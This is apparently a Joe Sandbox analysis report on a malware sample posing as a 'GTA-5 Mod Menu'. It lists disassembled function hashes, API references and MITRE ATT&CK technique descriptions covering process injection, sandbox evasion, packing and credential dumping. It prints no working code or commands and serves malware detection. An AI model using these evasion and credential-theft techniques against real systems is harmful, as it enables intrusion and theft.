Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3019521637
Opcode ID: cc09146f7d5bc5ed23749e2c0ca925ab8fed4af4605a6bcd1cf5e5daf659ee4d
Instruction ID: 7bdbaa239a1eeda55115639878b0d123996512eadf8676db9d11d74afae2cef4
Opcode Fuzzy Hash: cc09146f7d5bc5ed23749e2c0ca925ab8fed4af4605a6bcd1cf5e5daf659ee4d
Instruction Fuzzy Hash: 2B614376608300ABD714DF25CC81B3BB7E2EBC9304F18882DF98497295DB79DC01879A

Function 0041C8BE Relevance: 1.5, Strings: 1, Instructions: 227COMMON

Download Yara Rule

Strings

Z;X, xrefs: 0041C954

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID: Z;X
API String ID: 0-326540526
Opcode ID: bac4a5be097188d45ea84bbed28c61b25c95dd5e22ed60a3e02fc0b15043aafa
Instruction ID: ee6cd8e2b8b0198342e0577d4339d529b05c218f00070a7ece456827257b0640
Opcode Fuzzy Hash: bac4a5be097188d45ea84bbed28c61b25c95dd5e22ed60a3e02fc0b15043aafa
Instruction Fuzzy Hash: CF5133B0A4C3108BD301DF55CC8226BB7F2EFD2344F08892DE4C55B351E639D9428B5A

Function 0041C8D5 Relevance: 1.5, Strings: 1, Instructions: 223COMMON

Download Yara Rule

Strings

Z;X, xrefs: 0041C954

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID: Z;X
API String ID: 0-326540526
Opcode ID: a10614e7ccd5132e8508c60fb38d8d4dee78fb05a2d2a0ca0fb3c01a97a0625a
Instruction ID: a7070b123745184f32c7e8021e83fcde3f52a5f996bbeb945e2206caacc5af02
Opcode Fuzzy Hash: a10614e7ccd5132e8508c60fb38d8d4dee78fb05a2d2a0ca0fb3c01a97a0625a
Instruction Fuzzy Hash: 0C5123B1A8C3108BD315DF55CC822ABB7F2EFD2348F08892DE4C55B351E639C9468B5A

Function 0042CF3F Relevance: 1.4, Strings: 1, Instructions: 163COMMON

Download Yara Rule

Strings

v/#, xrefs: 0042D138

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID: v/#
API String ID: 0-2621095534
Opcode ID: 999fd48428407a1bcc05c500e686e739d52ee1ae81b2d434bd371b583955e88b
Instruction ID: ab4fdc6be8a7186e675a86437c2f1418d25c7775bc721b14dd0226c3e7f3ea3a
Opcode Fuzzy Hash: 999fd48428407a1bcc05c500e686e739d52ee1ae81b2d434bd371b583955e88b
Instruction Fuzzy Hash: 12515D7161C3D08BD7298B3898647FBBBE19FD7314F68896DC4DAC7291D63844068B46

Function 0040CC10 Relevance: 1.3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

Strings

=), xrefs: 0040CC28

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID: =)
API String ID: 0-1770242605
Opcode ID: bb520702fe06ce013c974efa43d0f167fac707ccf224fb93477b583c3aa7d35f
Instruction ID: 9462df852d96577253bbae2f981200c1cf968b24f9cf993081faa8480b0089ac
Opcode Fuzzy Hash: bb520702fe06ce013c974efa43d0f167fac707ccf224fb93477b583c3aa7d35f
Instruction Fuzzy Hash: 3EF04C755081814BD7009B34ECA66FBB7D4CF63308F18093CD1C5D32A3EA349511865B

Function 00418166 Relevance: .8, Instructions: 789COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 36fd1aed37f9d0440d5ad80bec1e7fa74854c04ab0b490fabf46ac63e6d71548
Instruction ID: 85a75629312d86150f2b545a91db51e68025471b4eb8e95bfea53dbe2cb05d27
Opcode Fuzzy Hash: 36fd1aed37f9d0440d5ad80bec1e7fa74854c04ab0b490fabf46ac63e6d71548
Instruction Fuzzy Hash: 7B324879610A00DFDB258F25CC9067777E2EF9B310F1889ADD4D68B766CB34A881CB19

Function 00407430 Relevance: .6, Instructions: 625COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40bf63cd71c07fb53522a215ca6e1361637acb4c75bb7a995d25c4e23e846dae
Instruction ID: 56d1f147cd060af2b7f7344e0d9e931e991897ba6981e263a57b0b04fb14db57
Opcode Fuzzy Hash: 40bf63cd71c07fb53522a215ca6e1361637acb4c75bb7a995d25c4e23e846dae
Instruction Fuzzy Hash: 4E22B232A087118BC725DE18D9806ABB3E1BFC4319F19893ED9C6A7381D738B851CB47

Function 0043F8A0 Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a00669c670d3003871b8140bf808ed1cd8b22db6a80ddb95f6d87f38655f937e
Instruction ID: 686053684b737d2ecc152786c79a2309da9fa9c5f8c4deb71dda74d38f3e75ae
Opcode Fuzzy Hash: a00669c670d3003871b8140bf808ed1cd8b22db6a80ddb95f6d87f38655f937e
Instruction Fuzzy Hash: 6DA13335A183119BC720DF28C88062BB7E2FF8D310F59983EE99597361D779AC45CB86

Function 0041BA29 Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 407652660b44c6792032eb5c382d1c016b43b61df4fe906baa70c74ae7b15fc1
Instruction ID: 31b0d93cc30ec3edebd44358e3b7e0d6a38ea81d195b51a1979558643ed22e82
Opcode Fuzzy Hash: 407652660b44c6792032eb5c382d1c016b43b61df4fe906baa70c74ae7b15fc1
Instruction Fuzzy Hash: 315134755007018BC3258F29C4A17B3B7B1FF5A310F18818ED4D64BBA2E739E881CB98

Function 004029E0 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1cd8c508e78ef8073936080974b298522d299879a719c0cc41071e3bc5569b2
Instruction ID: 42c5ab64a542005fbadb5cb2da5a8674fc7a5f5531ea7fdb17922c9c334201ec
Opcode Fuzzy Hash: e1cd8c508e78ef8073936080974b298522d299879a719c0cc41071e3bc5569b2
Instruction Fuzzy Hash: C2411632B0827147CB188E2D8D9417BBAE39FC5204B0EC63AFCC9AB7D6D578990197D4

Function 0041ACDA Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc4cc6d0190656e37b601dcc602b4663c53fa38f0bd0f9eea54efa4c519c4021
Instruction ID: f82c5a14085aa5c61eda4fbeacae995022f8bb6d82535ab9dd7600a61711b1f6
Opcode Fuzzy Hash: bc4cc6d0190656e37b601dcc602b4663c53fa38f0bd0f9eea54efa4c519c4021
Instruction Fuzzy Hash: B31178345046818FE7328F29D0503B2BFE2EF57315F2880DAC4D25BB82C2399886CB5A

Function 0041B5B9 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e66c2541647b8e62543e7f1797b5a8a6feffc91e0f52eabb29bb2806c92e489
Instruction ID: d838456b58017227ce043a87e1cc4ae84cc8ff7af8bbaabd92724fd3cbd6d722
Opcode Fuzzy Hash: 8e66c2541647b8e62543e7f1797b5a8a6feffc91e0f52eabb29bb2806c92e489
Instruction Fuzzy Hash: BE2128769046408BDB29CF35C8917B2BBA3EBA7310F1C856DD493D7396CB74A8068768

Function 00434E90 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: ec954f8137e4d140e6d4d376c15eee84be3ad36931f72bfd3336b2688414e86c
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 9611E933A091E50EC3168D3C84005A5BFA31AE7235F5D539AF4B49B2D2D6269D8A8359

Function 00429E60 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a35dbff6289815ffe861220c0bc0fbe87ba5018cf6d46c699ce90841ad03b4e
Instruction ID: c4cccad24f1be5721159f81bddb74e56e1ae0f04c305007aed06d0106061f318
Opcode Fuzzy Hash: 5a35dbff6289815ffe861220c0bc0fbe87ba5018cf6d46c699ce90841ad03b4e
Instruction Fuzzy Hash: 2C01B5F5B0031187DB20DE51A8C0727B2A95F90708F59043ED40857381DB79FC05C29A

Function 0041B497 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08ac9a234e31864cf5ea3c432b4305e24f7799c5fa33f59c8c4bbeb283ceb5fd
Instruction ID: 5c0740542d5a7d4cfd3105530cb8cc8e37dbcec940ab5f4ba463d89588c03cb0
Opcode Fuzzy Hash: 08ac9a234e31864cf5ea3c432b4305e24f7799c5fa33f59c8c4bbeb283ceb5fd
Instruction Fuzzy Hash: D8114970510A408FD765CF29D4A07A2BBF0FB4B318F54995DC0D6C7692C739E886CB58

Function 0042AF4D Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bc3f33579ba0a43ff606aebe652e4752b6dfc56651d9f35aac2ee44f655e06c
Instruction ID: de49addb4ddbcc45936637b2f08cc7901b37445ce009f58ede38f9ee4367339e
Opcode Fuzzy Hash: 2bc3f33579ba0a43ff606aebe652e4752b6dfc56651d9f35aac2ee44f655e06c
Instruction Fuzzy Hash: EAF0283060C5404BE7168B34D451BF7FBE0A7AB704F186C7DC5C5D3243E62CA452460E

Function 0040A4B5 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b11d23989305ef28c477e68356199a5a4452dc29e0fb07f479c7f0d70bdb8f3
Instruction ID: 33907db06b75b1cde1331380306e8094a8dd4b17d32d02a3482ed15d277e0220
Opcode Fuzzy Hash: 1b11d23989305ef28c477e68356199a5a4452dc29e0fb07f479c7f0d70bdb8f3
Instruction Fuzzy Hash: 45C0923CA58001C7CA08CF85F862A30A338B797209B25703ACA03E7292C528E8129A1E

Function 0040A706 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b80b9228edefec5c96295172a6f3e822064c2709ade7faf3deb89cfadb206b96
Instruction ID: 41de8a278b4918965351cc5c522e9341100c5c52662d57341aaec06ba183f624
Opcode Fuzzy Hash: b80b9228edefec5c96295172a6f3e822064c2709ade7faf3deb89cfadb206b96
Instruction Fuzzy Hash: CAC04878A4C001CBCB08CF08F8A2630B3B8BB9B209B16342D9986E3251C62898018A1D

Function 00431B56 Relevance: 28.1, APIs: 2, Strings: 14, Instructions: 93COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00431B60
VariantInit.OLEAUT32 ref: 00431B73

Strings

*, xrefs: 00431BF9
&, xrefs: 00431C19
!, xrefs: 00431C51
", xrefs: 00431C39
,, xrefs: 00431BE9
>, xrefs: 00431C59
$, xrefs: 00431C29
V, xrefs: 00431B99
, xrefs: 00431C49
T, xrefs: 00431BA9
R, xrefs: 00431BB9
., xrefs: 00431BD9
P, xrefs: 00431BC9
(, xrefs: 00431C09

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: Variant$ClearInit
String ID: $!$"$$$&$($*$,$.$>$P$R$T$V
API String ID: 2610073882-1201524646
Opcode ID: 06a6cceae169c134fcbded70663d9c0f3f4a0c3da90b1809db870c66d63c28bc
Instruction ID: e0c1a9893a19edd6d9587a119b8eb553071a514b2989ddf97aa59854fb5ded9d
Opcode Fuzzy Hash: 06a6cceae169c134fcbded70663d9c0f3f4a0c3da90b1809db870c66d63c28bc
Instruction Fuzzy Hash: 5641262550C7C18ED331CB38994979BBFD1ABD6214F088AADD4ED8B292DA754005CB63

Function 00431475 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 130memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 004314D0

Strings

B, xrefs: 004314A1
A, xrefs: 0043149C
O, xrefs: 00431492
0, xrefs: 00431737
C, xrefs: 004314A6
M, xrefs: 00431488

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: AllocString
String ID: 0$A$B$C$M$O
API String ID: 2525500382-2716710918
Opcode ID: ae69a02d88fb99d840e05068d38587f89b583c02ccf9d9729b4959b3f09a708a
Instruction ID: 74cababeb73acfd0e47c95d23968434f1a7cf6f31bfd3aa6325757e7800ce56c
Opcode Fuzzy Hash: ae69a02d88fb99d840e05068d38587f89b583c02ccf9d9729b4959b3f09a708a
Instruction Fuzzy Hash: FF817E2410DBC28DD2329B7C4848B8BBF916BA7234F484B9EE1F95B2E2D3744146C767

Function 0043185A Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 004318A0

Strings

/, xrefs: 004318CA
+, xrefs: 004318DE
), xrefs: 004318D4

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: InitVariant
String ID: )$+$/
API String ID: 1927566239-1266874367
Opcode ID: f2b24d567103f6d6a8e3c0ca5909584bc52282501cbefaba848369dabea96a0a
Instruction ID: 8e2c71c5bbafb8921c33810cfcee233a57ef7bcd092fd80acd7cd5f70142a860
Opcode Fuzzy Hash: f2b24d567103f6d6a8e3c0ca5909584bc52282501cbefaba848369dabea96a0a
Instruction Fuzzy Hash: 3251287150C7C18ED331DB38845838ABFD06B96324F188A9DE5E4873E2C7788545CB53

Function 00423270 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 151COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00423321
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 004233A8

Strings

6B, xrefs: 004233F1

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 6B
API String ID: 237503144-4127139157
Opcode ID: 239428adc5e95068f59c9505de3eb8bb242fc1c453d03ff40821e59bfc4ae666
Instruction ID: 07153cc709a0abca34db5d3603b05a66cdb020eb2d3d13012d77569f380638af
Opcode Fuzzy Hash: 239428adc5e95068f59c9505de3eb8bb242fc1c453d03ff40821e59bfc4ae666
Instruction Fuzzy Hash: 15314676608360CFD324CFA5AC8071BBBA5EBC2705F05863DE9A05B2C1DBB99905C797

Function 00432CEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00432D1B
GetSystemMetrics.USER32 ref: 00432D2A

Strings

, xrefs: 00432DD8

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 9045fd9fa8d0c70cafa05d7f2bc41b2ab8496edb7b7f8f5427a3d37f8d15449c
Instruction ID: e8ead997fea66f15498052154a86a76d15b965c9a51d8cd95930c0503aa07ab7
Opcode Fuzzy Hash: 9045fd9fa8d0c70cafa05d7f2bc41b2ab8496edb7b7f8f5427a3d37f8d15449c
Instruction Fuzzy Hash: 773161B49143148FDB00EF68DA8561EBBF4BB89304F51452EE498DB360D3B4A948CF96

Function 0040B620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00408A71), ref: 0040B626
FreeLibrary.KERNEL32 ref: 0040B647

Strings

#v, xrefs: 0040B626, 0040B647

Memory Dump Source

Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: FreeLibrary
String ID: #v
API String ID: 3664257935-554117064
Opcode ID: 3450f6972a44e0571a32aa1bb34743e8d31d7f597a8285ea3a337249caf4c94f
Instruction ID: 0da43da3f1c234e19d4c9429b1383541449f346d57cfa533a364a4621aeb1ed0
Opcode Fuzzy Hash: 3450f6972a44e0571a32aa1bb34743e8d31d7f597a8285ea3a337249caf4c94f
Instruction Fuzzy Hash: 3CC0027A902405EFDF026F62FE0E81A3A25FB9B30670408B5A906944B6DB634D20BB1D

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
